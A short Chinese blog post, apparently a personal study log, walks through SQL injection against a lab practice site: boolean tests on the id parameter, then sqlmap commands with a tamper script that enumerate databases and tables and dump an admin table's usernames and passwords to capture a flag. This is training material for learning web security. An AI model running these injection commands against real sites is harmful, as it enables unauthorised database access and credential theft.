Web安全学习记录第一弹-无WAF的sql注入

👤 cesii 📅 2022年09月03日 14:08 👁️ 阅读 273 📂 web漏洞

环境准备

靶站:http://rhiq8003.ia.aqlab.cn/

测试工具:SqlMap

测试环境:kali2022

查看数据回显

id=1id=1 and 1 = 1(语句成立)时返回正常数据
Web安全学习记录第一弹-无WAF的sql注入
id=1或者或id=1 and 1 = 2(语句不成立)时返回数据异常,由此判定存在SQL注入漏洞
Web安全学习记录第一弹-无WAF的sql注入

尝试获取测试靶站信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3
sqlmap的结果返回中可以看到操作系统为Windows、开发语言PHP、Web应用为Apache、数据库为MySQL
Web安全学习记录第一弹-无WAF的sql注入

获取数据库信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 --dbs --dump
Web安全学习记录第一弹-无WAF的sql注入

获取数据库表信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 -D maoshe --tables --dump
Web安全学习记录第一弹-无WAF的sql注入

获取表数据

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 -D maoshe -T admin --columns --dump
Web安全学习记录第一弹-无WAF的sql注入

获取字段数据

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%27" -D maoshe -T admin -C username,password --dump
Web安全学习记录第一弹-无WAF的sql注入
注:因为靶站是通关模式,所以到这里拿到flag就可以了。
Web安全学习记录第一弹-无WAF的sql注入